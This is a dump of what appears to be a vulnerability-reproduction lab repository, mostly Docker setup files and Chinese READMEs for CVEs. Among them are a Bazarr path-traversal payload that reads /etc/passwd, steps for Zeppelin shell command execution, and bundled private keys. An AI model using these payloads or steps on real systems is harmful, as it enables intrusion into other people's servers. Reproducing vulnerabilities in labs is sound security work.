│ │ ├── README.zh-cn.md
│ │ ├── docker-compose.yml
│ │ └── wp-automatic.zip
└── Bricks
│ └── CVE-2024-25600
│ ├── 0.1.png
│ ├── 0.2.png
│ ├── 0.3.png
│ ├── 0.4.png
│ ├── 0.5.png
│ ├── 1.png
│ ├── 2.png
│ ├── README.zh-cn.md
│ ├── bricks.1.9.5.zip
│ └── docker-compose.yml
├── YzmCMS
└── yzmcms-v7.0-db_pdo-where-rce
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── 4.png
│ ├── 5.png
│ ├── README.zh-cn.md
│ ├── database.sql
│ └── docker-compose.yml
├── ZenML
└── CVE-2024-25723
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── 4.png
│ └── README.zh-cn.md
├── ZenTao
└── ZenTaoPMS
│ └── QVD-2024-15263
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── 4.png
│ ├── 5.png
│ ├── 6.png
│ ├── 7.png
│ └── README.zh-cn.md
├── aiohttp
└── CVE-2024-23334
│ ├── Dockerfile
│ ├── README.zh-cn.md
│ ├── docker-compose.yml
│ └── web
│ └── aiohttpServer.py
├── codeastro
└── Membership Management System
│ └── CVE-2024-25869
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── README.zh-cn.md
│ ├── docker-compose.yml
│ └── membershiphp.sql
├── craftcms
└── CVE-2023-41892
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── 4.png
│ ├── README.zh-cn.md
│ └── docker-compose.yml
├── emlog
└── CVE-2024-33752
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── README.zh-cn.md
│ ├── docker-compose.yml
│ └── test.zip
├── langflow
└── CVE-2025-3248
│ ├── 1.png
│ ├── 2.png
│ ├── README.zh-cn.md
│ └── docker-compose.yml
├── likeshop
└── CVE-2024-0352
│ ├── 1.png
│ ├── README.zh-cn.md
│ └── docker-compose.yml
├── mtab
└── mtab-v2.1.0-sqli
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── README.zh-cn.md
│ ├── docker-compose.yml
│ └── install.sql
├── nginx-ui
└── CVE-2024-23827
│ ├── README.zh-cn.md
│ └── docker-compose.yml
├── ruoyi
└── RuoYi后台管理系统
│ └── ruoyi-rytask-any-reflection-call-rce
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── README.zh-cn.md
│ ├── docker-compose.yml
│ └── ry_20210210.sql
├── sonatype
└── nexus3
│ └── CVE-2024-4956
│ ├── 1.png
│ ├── 2.png
│ └── README.zh-cn.md
├── spring
└── MongoDB
│ └── CVE-2022-22980
│ ├── 1.png
│ ├── README.zh-cn.md
│ └── docker-compose.yml
├── vite
└── CVE-2025-30208
│ ├── 1.png
│ ├── README.zh-cn.md
│ └── docker-compose.yml
├── xwiki-platform
└── CVE-2025-24893
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── README.zh-cn.md
│ ├── docker-compose.yml
│ └── init.sql
├── xxl-job
└── xxl-job-v2.0.2-hessian2-deserialization-rce
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── 4.png
│ ├── README.zh-cn.md
│ ├── SwingLazyValue.hessian
│ ├── docker-compose.yml
│ └── tables_xxl_job.sql
├── yeswiki
└── CVE-2025-31131
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ └── README.zh-cn.md
├── zzzCMS
├── CVE-2023-45554
│ ├── 1.png
│ ├── 10.png
│ ├── 11.png
│ ├── 2.png
│ ├── 3.png
│ ├── 4.png
│ ├── 5.png
│ ├── 6.png
│ ├── 7.png
│ ├── 8.png
│ ├── 9.png
│ ├── README.zh-cn.md
│ └── docker-compose.yml
└── CVE-2023-45555
│ ├── 1.png
│ ├── 2.png
│ └── README.zh-cn.md
└── 帮管客CRM
└── 帮管客 CRM jiliyu SQL注入漏洞
├── 1.png
├── 2.png
├── 3.png
├── README.zh-cn.md
└── docker-compose.yml
/Apache/Archiva/CVE-2022-29405/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | java_web:
4 | image: shelter2024/apache-archiva-v2.2.7_web
5 | container_name: apache-archiva-v2.2.7_web
6 | ports:
7 | - "8080:8080"
8 |
9 |
10 |
--------------------------------------------------------------------------------
/Apache/ShenYu/CVE-2021-37580/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Apache/ShenYu/CVE-2021-37580/1.png
--------------------------------------------------------------------------------
/Apache/ShenYu/CVE-2021-37580/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Apache/ShenYu/CVE-2021-37580/2.png
--------------------------------------------------------------------------------
/Apache/ShenYu/CVE-2021-37580/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Apache/ShenYu/CVE-2021-37580/3.png
--------------------------------------------------------------------------------
/Apache/Spark/CVE-2022-33891/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | java_web:
4 | image: shelter2024/spark-v3.1.1-web
5 | container_name: spark-v3.1.1-web
6 | stdin_open: true
7 | tty: true
8 |
9 | ports:
10 | - "4040:4040"
11 |
--------------------------------------------------------------------------------
/Apache/Zeppelin/CVE-2024-31861/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Apache/Zeppelin/CVE-2024-31861/1.png
--------------------------------------------------------------------------------
/Apache/Zeppelin/CVE-2024-31861/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Apache/Zeppelin/CVE-2024-31861/2.png
--------------------------------------------------------------------------------
/Apache/Zeppelin/CVE-2024-31861/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Apache/Zeppelin/CVE-2024-31861/3.png
--------------------------------------------------------------------------------
/Apache/Zeppelin/CVE-2024-31861/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Apache/Zeppelin/CVE-2024-31861/4.png
--------------------------------------------------------------------------------
/Apache/Zeppelin/CVE-2024-31861/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # Apache Zeppelin 解释器sh命令执行漏洞(CVE-2024-31861)
2 |
3 | Apache Zeppelin是美国阿帕奇(Apache)基金会的一款基于Web的开源笔记本应用程序。该程序支持交互式数据分析和协作文档。
4 |
5 | 近日官方发布更新披露 CVE-2024-31861 Apache Zeppelin hell 代码注入漏洞,攻击者可利用Zeppelin 中的shell功能执行任意命令。升级后官方默认禁止shell interpreter,该漏洞的CVSS评分为8.9 Apache Zeppelin 安装时默认没有设置用户名密码,所以该漏洞也比较容易利用。
6 |
7 | 官网项目地址https://github.com/apache/zeppelin/releases
8 |
9 | 参考链接:
10 |
11 | - https://nvd.nist.gov/vuln/detail/CVE-2024-31861
12 |
13 | **影响版本**
14 |
15 | 0.10.1 <= Apache Zeppelin < 0.11.1
16 |
17 | ## 漏洞环境
18 |
19 | 执行如下命令启动一个zeppelin:0.10.1:
20 |
21 | ```
22 | docker run -d --name zeppelin0.9 -p 8888:8080 apache/zeppelin:0.10.1
23 | ```
24 |
25 | 服务启动后,可访问`http://your-ip:8888/`将看到zeppelin界面
26 |
27 | 
28 |
29 |
30 |
31 | ## 漏洞复现
32 |
33 | 1. 点击Notebook-->Create new note 选择Interpreter 为sh
34 |
35 | 
36 |
37 | 2. 在输入框中填写你想执行的命令
38 |
39 | 
40 |
41 | 3. 点击运行
42 |
43 | 
--------------------------------------------------------------------------------
/Apache/servicecomb-service-center/CVE-2023-44313/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | go_web:
4 | image: shelter2024/apache-servicecomb-service-center-v2.1.0-web
5 | container_name: apache-servicecomb-service-center-v2.1.0-web
6 |
7 | ports:
8 | - "30103:30103"
9 |
10 |
--------------------------------------------------------------------------------
/Bazarr/CVE-2024-40348/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Bazarr/CVE-2024-40348/1.png
--------------------------------------------------------------------------------
/Bazarr/CVE-2024-40348/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Bazarr/CVE-2024-40348/2.png
--------------------------------------------------------------------------------
/Bazarr/CVE-2024-40348/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # Bazarr 目录遍历漏洞(CVE-2024-40348)
2 |
3 | Bazarr是Sonarr和Radarr的配套应用程序,可根据您的要求管理和下载字幕。Bazarr存在任意文件读取漏洞,该漏洞是由于Bazaar v1.4.3的组件/api/swaggerui/static中存在一个问题,允许未经身份验证的攻击者可利用该漏洞执行目录遍历。
4 |
5 | 官方地址:https://www.bazarr.media/
6 |
7 | 版本影响:v1.4.3
8 |
9 | 参考链接
10 |
11 | - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
12 |
13 | ## 漏洞环境
14 |
15 | 执行如下命令启动一个bazarr:1.4.3
16 |
17 | ```sh
18 | sudo docker run --name=bazarr -e PUID=1000 -e PGID=1000 -e TZ=Etc/UTC -p 6767:6767 -v /path/to/bazarr/config:/config -v /path/to/movies:/movies `#optional` -v /path/to/tv:/tv `#optional` --restart unless-stopped lscr.io/linuxserver/bazarr:1.4.3
19 | ```
20 |
21 | 服务启动后,访问`http://your-ip:6767/`
22 |
23 | 
24 |
25 | ## 漏洞复现
26 |
27 | 发送如下payload
28 |
29 | /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
30 |
31 | 
32 |
33 |
--------------------------------------------------------------------------------
/BoidCMS/CVE-2023-38836/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/boidcms-v2.0.0-web
5 | container_name: boidcms-v2.0.0-web
6 | ports:
7 | - "8080:8080"
8 |
9 |
10 |
--------------------------------------------------------------------------------
/Cacti/CVE-2023-51448/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Cacti/CVE-2023-51448/1.png
--------------------------------------------------------------------------------
/Cacti/CVE-2023-51448/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Cacti/CVE-2023-51448/2.png
--------------------------------------------------------------------------------
/Cacti/CVE-2023-51448/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '2'
2 | services:
3 | web:
4 | image: shelter2024/cacti-v1.2.25-web
5 | ports:
6 | - "8080:80"
7 | depends_on:
8 | - db
9 | entrypoint:
10 | - bash
11 | - /entrypoint.sh
12 | volumes:
13 | - ./entrypoint.sh:/entrypoint.sh
14 | command: apache2-foreground
15 | db:
16 | image: mysql:5.7
17 | environment:
18 | - MYSQL_ROOT_PASSWORD=root
19 | - MYSQL_DATABASE=cacti
20 |
--------------------------------------------------------------------------------
/Cacti/CVE-2023-51448/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -ex
3 |
4 | wait-for-it db:3306 -t 300 -- echo "database is connected"
5 | if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
6 | mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
7 | mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
8 | mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
9 | fi
10 |
11 | chown www-data:www-data -R /var/www/html
12 | # first arg is `-f` or `--some-option`
13 | if [ "${1#-}" != "$1" ]; then
14 | set -- apache2-foreground "$@"
15 | fi
16 |
17 | exec "$@"
18 |
--------------------------------------------------------------------------------
/Cacti/CVE-2024-25641/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Cacti/CVE-2024-25641/1.png
--------------------------------------------------------------------------------
/Cacti/CVE-2024-25641/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Cacti/CVE-2024-25641/2.png
--------------------------------------------------------------------------------
/Cacti/CVE-2024-25641/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Cacti/CVE-2024-25641/3.png
--------------------------------------------------------------------------------
/Cacti/CVE-2024-25641/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '2'
2 | services:
3 | web:
4 | image: shelter2024/cacti-v1.2.25-web
5 | ports:
6 | - "8080:80"
7 | depends_on:
8 | - db
9 | entrypoint:
10 | - bash
11 | - /entrypoint.sh
12 | volumes:
13 | - ./entrypoint.sh:/entrypoint.sh
14 | command: apache2-foreground
15 | db:
16 | image: mysql:5.7
17 | environment:
18 | - MYSQL_ROOT_PASSWORD=root
19 | - MYSQL_DATABASE=cacti
20 |
--------------------------------------------------------------------------------
/Cacti/CVE-2024-25641/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -ex
3 |
4 | wait-for-it db:3306 -t 300 -- echo "database is connected"
5 | if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
6 | mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
7 | mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
8 | mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
9 | fi
10 |
11 | chown www-data:www-data -R /var/www/html
12 | # first arg is `-f` or `--some-option`
13 | if [ "${1#-}" != "$1" ]; then
14 | set -- apache2-foreground "$@"
15 | fi
16 |
17 | exec "$@"
18 |
--------------------------------------------------------------------------------
/Cacti/CVE-2024-25641/test.xml.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Cacti/CVE-2024-25641/test.xml.gz
--------------------------------------------------------------------------------
/CrateDB/CVE-2024-24565/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.8'
2 | services:
3 | crate:
4 | image: crate:5.6.1
5 | container_name: cratedb-v5.6.1-web
6 | ports:
7 | - "4200:4200"
8 | - "5432:5432"
9 | environment:
10 | - CRATE_HEAP_SIZE=1g
11 |
12 |
--------------------------------------------------------------------------------
/DedeCMS/CVE-2023-2928/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/dedecms-v5.7.106-web
5 | container_name: DedeCms-v5.7.106-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: DedeCms-v5.7.106-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 |
16 |
--------------------------------------------------------------------------------
/DedeCMS/CVE-2024-3148/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/DedeCMS/CVE-2024-3148/1.png
--------------------------------------------------------------------------------
/DedeCMS/CVE-2024-3148/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/DedeCMS/CVE-2024-3148/2.png
--------------------------------------------------------------------------------
/DedeCMS/CVE-2024-3148/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/DedeCMS/CVE-2024-3148/3.png
--------------------------------------------------------------------------------
/DedeCMS/CVE-2024-3148/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/DedeCMS/CVE-2024-3148/4.png
--------------------------------------------------------------------------------
/DedeCMS/CVE-2024-3148/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/DedeCMS/CVE-2024-3148/5.png
--------------------------------------------------------------------------------
/DedeCMS/CVE-2024-3148/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/DedeCMS/CVE-2024-3148/6.png
--------------------------------------------------------------------------------
/DedeCMS/CVE-2024-3148/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/dedecms-v5.7.112-web
5 | container_name: DedeCms-v5.7.112-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: DedeCms-v5.7.112-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 |
16 |
--------------------------------------------------------------------------------
/GeoServer/CVE-2023-51444/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GeoServer/CVE-2023-51444/1.png
--------------------------------------------------------------------------------
/GeoServer/CVE-2023-51444/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GeoServer/CVE-2023-51444/2.png
--------------------------------------------------------------------------------
/GeoServer/CVE-2023-51444/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GeoServer/CVE-2023-51444/3.png
--------------------------------------------------------------------------------
/GeoServer/CVE-2023-51444/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GeoServer/CVE-2023-51444/4.png
--------------------------------------------------------------------------------
/GitLab/CVE-2023-2825/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GitLab/CVE-2023-2825/0.png
--------------------------------------------------------------------------------
/GitLab/CVE-2023-2825/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GitLab/CVE-2023-2825/1.png
--------------------------------------------------------------------------------
/GitLab/CVE-2023-2825/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GitLab/CVE-2023-2825/2.png
--------------------------------------------------------------------------------
/GitLab/CVE-2023-2825/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GitLab/CVE-2023-2825/3.png
--------------------------------------------------------------------------------
/GitLab/CVE-2023-2825/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GitLab/CVE-2023-2825/4.png
--------------------------------------------------------------------------------
/GitLab/CVE-2023-2825/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/GitLab/CVE-2023-2825/5.png
--------------------------------------------------------------------------------
/Hoverfly/CVE-2024-45388/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Hoverfly/CVE-2024-45388/1.png
--------------------------------------------------------------------------------
/Jenkins/CVE-2024-23897/0.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Jenkins/CVE-2024-23897/0.1.png
--------------------------------------------------------------------------------
/Jenkins/CVE-2024-23897/0.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Jenkins/CVE-2024-23897/0.2.png
--------------------------------------------------------------------------------
/Jenkins/CVE-2024-23897/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Jenkins/CVE-2024-23897/1.png
--------------------------------------------------------------------------------
/Jenkins/CVE-2024-23897/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Jenkins/CVE-2024-23897/2.png
--------------------------------------------------------------------------------
/Jenkins/CVE-2024-23897/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.8'
2 | services:
3 | jenkins:
4 | container_name: jenkins
5 | image: jenkins/jenkins:2.426.2
6 | ports:
7 | - "8080:8080"
8 | - "50000:50000"
9 | volumes:
10 | - jenkins_home:/var/jenkins_home
11 |
12 | volumes:
13 | jenkins_home:
14 |
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27198/0.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27198/0.1.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27198/0.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27198/0.2.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27198/0.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27198/0.3.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27198/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27198/1.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27198/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27198/2.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27198/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27198/3.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27198/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 |
3 | services:
4 | teamcity:
5 | image: jetbrains/teamcity-server:2023.11.3
6 | container_name: teamcity-v2023.11.3-web
7 | ports:
8 | - "8111:8111"
9 | user: root
10 |
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27199/1.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27199/2.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27199/3.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27199/4.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/JetBrains/TeamCity/CVE-2024-27199/5.png
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/cert.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN CERTIFICATE-----
2 | MIICYjCCAgegAwIBAgIUFHRabDe2dTOHNe8at5fDfsigDJwwCgYIKoZIzj0EAwIw
3 | gYUxCzAJBgNVBAYTAmNuMQswCQYDVQQIDAJobjENMAsGA1UEBwwEbmFtZTEQMA4G
4 | A1UECgwHY29tcGFueTESMBAGA1UECwwJdW5pdCBuYW1lMRQwEgYDVQQDDAtjb21t
5 | b24tbmFtZTEeMBwGCSqGSIb3DQEJARYPYWRtaW5AYWRtaW4uY29tMB4XDTI0MDMx
6 | MTA3NTQwN1oXDTI1MDMwNjA3NTQwN1owgYUxCzAJBgNVBAYTAmNuMQswCQYDVQQI
7 | DAJobjENMAsGA1UEBwwEbmFtZTEQMA4GA1UECgwHY29tcGFueTESMBAGA1UECwwJ
8 | dW5pdCBuYW1lMRQwEgYDVQQDDAtjb21tb24tbmFtZTEeMBwGCSqGSIb3DQEJARYP
9 | YWRtaW5AYWRtaW4uY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xj
10 | dm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4
11 | WlDf5a1XnSQBB6NTMFEwHQYDVR0OBBYEFIP5qYGpT7CujDvYGCNtsCiycOmdMB8G
12 | A1UdIwQYMBaAFIP5qYGpT7CujDvYGCNtsCiycOmdMA8GA1UdEwEB/wQFMAMBAf8w
13 | CgYIKoZIzj0EAwIDSQAwRgIhAMcfVmbn711/5hOhnryKro9XH5m77DK/vmBvR0mk
14 | SIYVAiEApXhoDMQiv/0NVbZrOyW+c6oMSlg3CuKtAj6Sd5hxWR0=
15 | -----END CERTIFICATE-----
16 |
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 |
3 | services:
4 | teamcity:
5 | image: jetbrains/teamcity-server:2023.11.3
6 | container_name: teamcity-v2023.11.3-web
7 | ports:
8 | - "8111:8111"
9 | - "8443:8443"
10 | user: root
11 |
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/hax.key:
--------------------------------------------------------------------------------
1 | -----BEGIN PRIVATE KEY-----
2 | MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgflqLec/N8uvpqGUK
3 | Z7sGvs81dBDffRUw+ufigYq016ChRANCAAQwnpEjReN2bva/YCNiXRIYE8AL9Opc
4 | dt1LIlLOoOawfUO78zy+UGQ7VBic1ty6Kqe8Qed95rhaUN/lrVedJAEH
5 | -----END PRIVATE KEY-----
6 |
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/private-eckey.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN EC PRIVATE KEY-----
2 | MHcCAQEEIH5ai3nPzfLr6ahlCme7Br7PNXQQ330VMPrn4oGKtNegoAoGCCqGSM49
3 | AwEHoUQDQgAEMJ6RI0Xjdm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBk
4 | O1QYnNbcuiqnvEHnfea4WlDf5a1XnSQBBw==
5 | -----END EC PRIVATE KEY-----
6 |
--------------------------------------------------------------------------------
/JetBrains/TeamCity/CVE-2024-27199/public-key.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN PUBLIC KEY-----
2 | MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xjdm72v2AjYl0SGBPAC/Tq
3 | XHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4WlDf5a1XnSQBBw==
4 | -----END PUBLIC KEY-----
5 |
--------------------------------------------------------------------------------
/LyLme_Spage/CVE-2024-34982/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/LyLme_Spage/CVE-2024-34982/1.png
--------------------------------------------------------------------------------
/LyLme_Spage/CVE-2024-34982/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/LyLme_Spage/CVE-2024-34982/2.png
--------------------------------------------------------------------------------
/LyLme_Spage/CVE-2024-34982/3.png:
--------------------------------------------------------------------------------
